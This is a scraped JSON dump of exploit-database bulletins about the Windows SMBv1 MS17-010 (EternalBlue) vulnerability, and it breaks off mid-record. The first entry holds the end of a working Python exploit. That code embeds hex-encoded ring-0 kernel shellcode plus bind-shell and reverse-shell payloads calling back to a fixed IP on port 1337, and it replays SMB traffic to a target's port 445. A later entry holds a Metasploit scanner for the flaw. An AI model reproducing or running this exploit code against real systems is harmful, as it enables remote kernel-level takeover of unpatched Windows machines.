b\"\\\\x00\\\\x00\\\\x00\\'\\\\xffSMBt\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x02\\\\xff\\\\x00\\'\\\\x00\\\\x00\\\\x00\", 0.0)', \"('recv', 1, 0.0)\", \"('close', 1, 0.0)\"]\r\n datfile = [ast.literal_eval(i) for i in datfile]\r\n orig_shellcode = binascii.unhexlify(b'31c040907408e809000000c22400e8a7000000c3e801000000eb905bb9760100000f32a3fcffdfff8d431731d20f30c3b9230000006a300fa18ed98ec1648b0d400000008b6104ff35fcffdfff609c6a23529c6a0283c2089d804c2401026a1bff350403dfff6a0055535657648b1d1c0000006a3b8bb324010000ff3331c04889038b6e286a0183ec4881ed9c020000a1fcffdfffb97601000031d20f30fbe811000000fa648b0d400000008b610483ec289d61c3e9ef000000b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe838000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f8ff2425f80fd0ff31c040900f84b5050000e800000000586089c389e583ec48648b0d38000000668b4106c1e010668b01662500f08b086681f94d5a74072d00100000ebf08945fc5389c3b9940169e3e83e0100008945f8b9855483f0e8310100008945f4b92e5b51d2e8240100008945ec5b8d55e831c9890a526a00526a0bffd08b55e885d20f8402010000526a00ff55f885c00f84f4000000506a00ff75e8506a0bff55ec85c00f85e000000058502dfc000000051c01000050e880010000b9fa3cadc239c8741eb91abd4b2b39c87415588b55e881ea1c0100000f8cac0000008955e8ebce588b70ecff55f489f05050682e6461746a61e82702000085c00f84880000005883e940e85a02000085c074158b16c1ea1889f0c1e81839d075078b464885c0740a83c60483e904e35eebd88975f05668f80f00006a00ff55f885c0744a5089c731c089c16681c10004f3ab5889008b550489500431d78b55f889500831d78b55f489500c31d78b55f089501031d789782483c04889c78db396030000b91a020000f3a45b89433889ec61c3535251575589e583ec1889cf89d88945fce87a00000085c0746d8945f8e8ee0000008945f48b45fc8b4df8e80e01000085c074538945f08b45fc8b4df8e80401000085c074418945ec8b45fc8b4df8e8fa00000085c0742f8945e88b45fc89f98b55ec8b5df4e8ab00000085c0741889c18b45e8e8dd0000006689c28b45fc8b4df0e8d700000083c4185d5f595a5bc35689c683c63c8b3601c666813e5045750983c6788b3601f05ec331c0ebfa56515789c631c089c7c1e70729c789f831c98a0e80f900740501c846ebe95f595ec356575289c631c089c7c1e70729c789f831d28a1601d046e2ee5a5f5ec356515789c631c089c7c1e70729c789f831c98a0e80f90074c601c84646ebe85f595ec383c0188b00c357565131ff89c639df74198b04ba01f0e883ffffff39c8740747ebeb595e5fc389f8ebf831c0ebf483c11c8b0901c8c383c1208b0901c8c383c1248b0901c8c3d1e101c8668b00c381e2ffff0000c1e20201d18b0901c8c352568b74240c8b4c241031d2d1e985c9740cc1c205ac460c2030c249ebf089d05e5ac20800585a5f5e505689f083c63c8b3601c631c089c1668b4e06668b461401c683c61885c9741d8b0639f875078b460439d0740683c62849ebe98b460c8b4e085e01c6c331f6c36031c083f80f741e31c98b3c868b148e39d774034175f30fb694038703000039d1750d40ebdd4139c875056131c040c36131c0c3000102030405060708090a09090d0e8b4c240860e8000000005d6681e500f0894d34e8d9010000e843010000e87f01000085c00f84e30000008b5d3c8b4bd8e8170100003c23740d3c77741c3cc87422e9b60000008b4d388b452489410e31c0884112e99f000000e813010000e9b50000008b5d3c8b43e88b303375288b7808337d288b40043345283b431089c3757b8b4d3039f18b452c7418e8f20000008d4604506a00ff550885c0746389452c89753001df39f7775329df01c75789f28b753c8b76f089d9f3a45e89d9c1e9028b5d28311e83c604e2f901d039c67c288b452c6089e650ffd089f461e8a10000008b4524d1e831c988c101e98b0931c8894524e868000000b010eb08b020eb04b030eb008b4d38b4006601411e8b45108944241c61ff603c8d45488b4d0c89884701000089a83e01000066b810008b4d386601411e8b45108944241c6168000000008b403c506800000000c331c088c8c1e90800c8c1e90800c8c1e90800c8c3518b452489c10fc9d1e031c889452859c360e80b0000008b45108b483c89483861c3608b5d2c85db740d31c089df8b4d30f3aa53ff550c31c089453089452c61c357525689cf8b55448b0ae83900000085c0750e83c2088b0ae82b00000085c07421894d446a0c588d71543b06740783c6043b06750d3b4604750889753c31c040eb0231c05e5a5fc331c039c17d0140c3525131d2668b510201ca3b11740583c104ebf75a8d411c83c00724f88945448b41f889453889d15ac35355575641544155415641574889e54881ec800000006683e4f0e883030000488945f84889c3b92e5b51d2e8ee0100004885c00f84d50100004889c6b9940169e3e8d80100004885c00f84bf010000488945f04889c7b9855483f0e8be0100004885c00f84a5010000488945e84c8d4dd04d31c04c89c1448945d04c89c2b10bffd6448b45d04585c00f847f0100008b55d04831c9ffd74885c00f846e0100004889c34831c94989c9448b45d04889c2b10bffd64885c00f85510100004889d8482df80000004805280100008b55d081ea280100000f8c330100008955d050e83f0200004889c258b9fa3cadc24839ca740ab91abd4b2b4839ca75ca488b70e84889d9ff55e84889f04831d24889c38b503c4801d04889c64831c94889ca668b4806668b50144801d64883c61848bf2e646174610000004883f9000f84cd000000488b064839f874094883c62848ffc9ebe58b460c8b4e084801c648bbfefefefefefefefe4883e9084883f9000f8c9b000000488b3e4839df750c4c8b86980000004d85c074064883c608ebd84883c608488975e04831c9baf00f0000ff55f04885c074694989c14831c0b9000400004c89cff3ab4c89cf4883c760488d35910200004831c966b93602f3a44d8909488b5df8498959084831df488b5df0498959104831df488b5de8498959184831df488b5de0498959204831df41897944488b45e04883c0704983c1604c890848')\r\n \r\n # ASM Multi-Arch Kernel Ring 0 Shellcode by ZeroSum0x0: https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm\r\n # Modification to this shellcode:\r\n # Code has been modified to call \"KeUnstackDetachProcess\" aproper KeUnstackDetachProcess routine detaches the current thread from the address space of a process and restores the previous attach state. \r\n # Every successful call to KeStackAttachProcess must be matched by a subsequent call to KeUnstackDetachProcess. \r\n kernel_shellcode = binascii.unhexlify(b'b9820000c00f3248bbf80fd0ffffffffff8953048903488d050a0000004889c248c1ea200f30c30f01f865488924251000000065488b2425a801000050535152565755415041514152415341544155415641576a2b65ff34251000000041536a33514c89d14883ec08554881ec58010000488dac248000000048899dc00000004889bdc80000004889b5d000000048a1f80fd0ffffffffff4889c248c1ea204831dbffcb4821d84831c9b9820000c00f30fbe839000000fa65488b2425a80100004883ec78415f415e415d415c415b415a415941585d5f5e5a595b5865488b2425100000000f01f83eff2425f80fd0ff56415741564155415453554889e56683e4f04883ec204c8d35e3ffffff654c8b3c25380000004d8b7f0449c1ef0c49c1e70c4981ef00100000498b376681fe4d5a75ef41bc2004000031db89d983c10481f9000001000f8d5e0100004c89f289cb41bb6655a24be8b401000085c075db498b0e41bba36f722de8a20100004889c6e8480100004181f9bf771fdd75bc498b1e4d8d6e104c89ea4889d941bbe52411dce8790100006a4068001000004d8d4e0849c701001000004d31c04c89f231c948890a48f7d141bb4bca0aee4883ec20e84a010000498b3e488d35e900000031c966030dd70100006681c1f900f3a44889de4881c6080300004889f1488b114c29e251524889d14883ec2041bb2640369de8090100004883c4205a594885c07418488b80c80200004885c0740c4883c24c8b020fbae0057205488b09ebbe4883ea4c4989d431d280c29031c941bb26ac5091e8c80000004889c14c8d898000000041c601c34c89e24989c44d31c041506a01498b065041504883ec2041bbacce554be89800000031d25252415841594c89e141bb1838099ee8820000004c89e941bb22b7b37de8740000004889d941bb0de24d85e8660000004889ec5d5b415c415d415e415f5ec3e9b50000004d31c931c0ac41c1c90d3c617c022c204101c138e075ecc331d265488b5260488b5218488b5220488b12488b7250480fb74a4a4531c931c0ac3c617c022c2041c1c90d4101c1e2ee4539d975da4c8b7a20c34c89f8415141505251564889c28b423c4801d08b80880000004801d0508b4818448b40204901d048ffc9418b34884801d6e878ffffff4539d975ec58448b40244901d066418b0c48448b401c4901d0418b04884801d05e595a41584159415b4153ffe0564157554889e54883ec2041bbda16af92e84dffffff31c95151515141594c8d051a0000005a4883ec2041bb46451b22e868ffffff4889ec5d415f5ec3') \r\n \r\n # Shellcode TCP Bind port: 1337 size 484 bytes\r\n bindtcp_shellcode = binascii.unhexlify(b'fc4881e4f0ffffffe8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e54831c0505049c7c40200053941544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a025950504d31c94d31c048ffc04889c241baea0fdfe0ffd54889c76a1041584c89e24889f941bac2db3767ffd54831d24889f941bab7e938ffffd54d31c04831d24889f941ba74ec3be1ffd54889f94889c741ba756e4d61ffd54881c4b00200004883ec104889e24d31c96a0441584889f941ba02d9c85fffd54883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd54801c34829c64885f675e141ffe758')\r\n \r\n # Shellcode TCP Reverse to 192.168.125.133 1337 \r\n reversetcp_shellcode = binascii.unhexlify(b'fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000539c0a87d8541544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd550504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd54881c44002000049b8636d640000000000415041504889e25757574d31c06a0d594150e2fc66c74424540101488d442418c600684889e6565041504150415049ffc0415049ffc84d89c14c89c141ba79cc3f86ffd54831d248ffca8b0e41ba08871d60ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5')\r\n \r\n shellcode = reversetcp_shellcode\r\n new_shellcode = kernel_shellcode + int(len(shellcode)).to_bytes(2,'little') + shellcode\r\n to_replace = orig_shellcode[:len(new_shellcode)]\r\n new_datfile = []\r\n for i in datfile:\r\n if i[0] != 'send':\r\n new_datfile.append(i)\r\n continue\r\n j = list(i)\r\n j[2] = j[2].replace(to_replace,new_shellcode)\r\n new_datfile.append(tuple(j))\r\n open(\"smb.dat\",\"w\").write(\"\\n\\n\".join([repr(i) for i in new_datfile]))\r\n \r\ndef main(hostip):\r\n # Modify original .dat file and add/replace Kernel Shellcode by Zerosum0x0 + User Shellcode\r\n mod_replay()\r\n # Read dat file and send it over\r\n dattosend = open(\"smb.dat\").read().split(\"\\n\\n\")\r\n dattosend = [ast.literal_eval(i) for i in dattosend]\r\n connections = []\r\n userid = b'\\x00\\x08'\r\n treeid = b'\\x00\\x08'\r\n start = time.monotonic()\r\n for i in dattosend:\r\n delta = i[-1] - (start - time.monotonic())\r\n if delta > 0:\r\n time.sleep(delta)\r\n start = time.monotonic()\r\n if i[0] == \"connect\":\r\n sock = socket.socket()\r\n sock.connect((hostip,445))\r\n connections.append({\"socket\":sock,\"stream\" : i[1]})\r\n if i[0] == \"close\":\r\n [j['socket'].close() for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"send\":\r\n data = i[2].replace(b\"__USERID__PLACEHOLDER__\", userid)\r\n data = data.replace(b\"__TREEID__PLACEHOLDER__\", treeid)\r\n [j['socket'].send(data) for j in connections if j[\"stream\"] == i[1]]\r\n if i[0] == \"recv\":\r\n data = [j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]\r\n if len(i) > 3:\r\n if i[2] == \"treeid\":\r\n treeid = data[0][28:30]\r\n if i[2] == \"userid\":\r\n userid = data[0][32:34]\r\n os.remove(\"smb.dat\")\r\n print(\"[*] Thanks NSA!\")\r\n print(\"[*] Creditz: @EquationGroup @ShadowBrokers @progmboy @zerosum0x0 @juansacco\")\r\n print(\"[*] KPN Red team: <[email\u00a0protected]>\")\r\n \r\nif __name__ == \"__main__\":\r\n print(\"[*] MS17-010 Exploit - SMBv1 SrvOs2FeaToNt OOB\")\r\n print(\"[*] Exploit running.. Please wait\")\r\n main(sys.argv[1])\n\n# 0day.today [2018-03-19] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-27613", "hash": "7a664c638139ed90355f85360cad3cd0", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows - Uncredentialed SMB RCE (MS17-010) Exploit", "description": "This Metasploit module uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. This Metasploit module does not require valid SMB credentials in default server configurations. It can log on as the user \"\\\" and connect to IPC$.", "published": "2017-04-17T00:00:00", "modified": "2017-04-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27613", "reporter": "Sean Dillon", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-01-10T11:22:44", "history": [], "viewCount": 43, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2018-01-10T11:22:44", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2018-01-10T11:22:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/27613", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\n# auxiliary/scanner/smb/smb_ms_17_010\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Auxiliary\r\n \r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Exploit::Remote::SMB::Client::Authenticated\r\n \r\n include Msf::Auxiliary::Scanner\r\n include Msf::Auxiliary::Report\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 SMB RCE Detection',\r\n 'Description' => %q{\r\n Uses information disclosure to determine if MS17-010 has been patched or not.\r\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\r\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\r\n not have the MS17-010 patch.\r\n \r\n This module does not require valid SMB credentials in default server\r\n configurations. It can log on as the user \"\\\" and connect to IPC$.\r\n },\r\n 'Author' => [ 'Sean Dillon <[email\u00a0protected]>' ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2017-0143'],\r\n [ 'CVE', '2017-0144'],\r\n [ 'CVE', '2017-0145'],\r\n [ 'CVE', '2017-0146'],\r\n [ 'CVE', '2017-0147'],\r\n [ 'CVE', '2017-0148'],\r\n [ 'MSB', 'MS17-010'],\r\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\r\n ],\r\n 'License' => MSF_LICENSE\r\n ))\r\n end\r\n \r\n def run_host(ip)\r\n begin\r\n status = do_smb_probe(ip)\r\n \r\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\r\n print_warning(\"Host is likely VULNERABLE to MS17-010!\")\r\n report_vuln(\r\n host: ip,\r\n name: self.name,\r\n refs: self.references,\r\n info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$'\r\n )\r\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\r\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\r\n print_good(\"Host does NOT appear vulnerable.\")\r\n else\r\n print_bad(\"Unable to properly detect if host is vulnerable.\")\r\n end\r\n \r\n rescue ::Interrupt\r\n print_status(\"Exiting on interrupt.\")\r\n raise $!\r\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\r\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\r\n rescue ::Exception => e\r\n vprint_error(\"#{e.class}: #{e.message}\")\r\n ensure\r\n disconnect\r\n end\r\n end\r\n \r\n def do_smb_probe(ip)\r\n connect\r\n \r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n \r\n # connect to IPC$\r\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\r\n simple.connect(ipc_share)\r\n tree_id = simple.shares[ipc_share]\r\n \r\n print_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\r\n \r\n # request transaction with fid = 0\r\n pkt = make_smb_trans_ms17_010(tree_id)\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n \r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n \r\n # convert error code to string\r\n code = pkt['SMB'].v['ErrorClass']\r\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\r\n status = smberr.get_error(code)\r\n \r\n print_status(\"Received #{status} with FID = 0\")\r\n status\r\n end\r\n \r\n def make_smb_trans_ms17_010(tree_id)\r\n # make a raw transaction packet\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n \r\n # opcode 0x23 = PeekNamedPipe, fid = 0\r\n setup = \"\\x23\\x00\\x00\\x00\"\r\n setup_count = 2 # 2 words\r\n trans = \"\\\\PIPE\\\\\\x00\"\r\n \r\n # calculate offsets to the SetupData payload\r\n base_offset = pkt.to_s.length + (setup.length) - 4\r\n param_offset = base_offset + trans.length\r\n data_offset = param_offset # + 0\r\n \r\n # packet baselines\r\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\r\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload'].v['ParamCountMax'] = 0xffff\r\n pkt['Payload'].v['DataCountMax'] = 0xffff\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n \r\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup\r\n pkt['Payload'].v['Payload'] = trans\r\n \r\n pkt.to_s\r\n end\r\nend\n\n# 0day.today [2018-01-10] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}, {"id": "1337DAY-ID-27786", "hash": "357c2726c884a3517306631cad497f2c", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Exploit", "description": "This Metasploit module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.", "published": "2017-05-17T00:00:00", "modified": "2017-05-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27786", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-04-12T21:52:02", "history": [], "viewCount": 351, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2018-04-12T21:52:02", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": 